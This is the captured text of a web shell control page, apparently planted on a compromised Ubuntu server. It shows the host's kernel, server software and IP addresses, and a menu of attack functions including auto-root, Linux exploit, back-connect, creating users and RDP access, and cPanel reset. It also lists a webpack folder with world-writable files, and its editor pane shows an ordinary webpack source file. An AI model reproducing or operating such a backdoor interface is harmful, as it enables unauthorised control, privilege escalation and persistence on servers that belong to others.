Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
webpack /
lib /
asset /
[ HOME SHELL ]
Name
Size
Permission
Action
AssetGenerator.js
20.42
KB
-rw-rw-rw-
AssetModulesPlugin.js
7.12
KB
-rw-rw-rw-
AssetParser.js
2.07
KB
-rw-rw-rw-
AssetSourceGenerator.js
3.9
KB
-rw-rw-rw-
AssetSourceParser.js
1.05
KB
-rw-rw-rw-
RawDataUrlModule.js
4.93
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AssetSourceParser.js
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Yuta Hiroto @hiroppy */ "use strict"; const Parser = require("../Parser"); /** @typedef {import("../Module").BuildInfo} BuildInfo */ /** @typedef {import("../Module").BuildMeta} BuildMeta */ /** @typedef {import("../Parser").ParserState} ParserState */ /** @typedef {import("../Parser").PreparsedAst} PreparsedAst */ class AssetSourceParser extends Parser { /** * @param {string | Buffer | PreparsedAst} source the source to parse * @param {ParserState} state the parser state * @returns {ParserState} the parser state */ parse(source, state) { if (typeof source === "object" && !Buffer.isBuffer(source)) { throw new Error("AssetSourceParser doesn't accept preparsed AST"); } const { module } = state; /** @type {BuildInfo} */ (module.buildInfo).strict = true; /** @type {BuildMeta} */ (module.buildMeta).exportsType = "default"; /** @type {BuildMeta} */ (state.module.buildMeta).defaultObject = false; return state; } } module.exports = AssetSourceParser;
Close